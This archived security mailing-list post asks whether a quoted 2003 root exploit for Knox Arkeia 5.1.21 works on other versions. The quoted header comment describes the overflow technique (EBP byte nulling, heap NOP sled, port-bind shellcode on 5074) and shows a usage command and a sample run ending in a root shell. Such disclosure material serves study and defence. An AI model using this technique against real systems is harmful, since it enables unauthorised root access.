| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
From: dlhane at sbcglobal.net (David Hane) Subject: Knox Arkeia 5.1.21 local/remote root exploit Have you tested this on other versions? DH On Friday 19 September 2003 10:36, A. C. wrote: > Exploit attached for Knox Arkeia Pro v5.1.21 backup > software from http://www.arkeia.com. > > > > > /* > * Knox Arkiea arkiead local/remote root exploit. > * > * Portbind 5074 shellcode > * > * Tested on Redhat 8.0, Redhat 7.2, but all versions > are presumed vulnerable. > * > * NULLs out least significant byte of EBP to pull EIP > out of overflow buffer. > * A previous request forces a large allocation of > NOP's + shellcode in heap > * memory. Find additional targets by searching the > heap for NOP's after a > * crash. safeaddr must point to any area of memory > that is read/writable > * and won't mess with program/shellcode flow. > * > * ./ark_sink host targetnum > * [user@...t dir]$ ./ark_sink 192.168.1.2 1 > * [*] Connected to 192.168.1.2:617 > * [*] Connected to 192.168.1.2:617 > * [*] Sending nops+shellcode > * [*] Done, sleeping > * [*] Sending overflow > * [*] Done > * [*] Sleeping and connecting remote shell > * [*] Connected to 192.168.1.2:5074 > * [*] Success, enjoy > * id > * uid=0(root) gid=0(root) > groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) > * > * > */ > > > > > __________________________________ > Do you Yahoo!? > Yahoo! SiteBuilder - Free, easy-to-use web site design software > http://sitebuilder.yahoo.com
Powered by blists - more mailing lists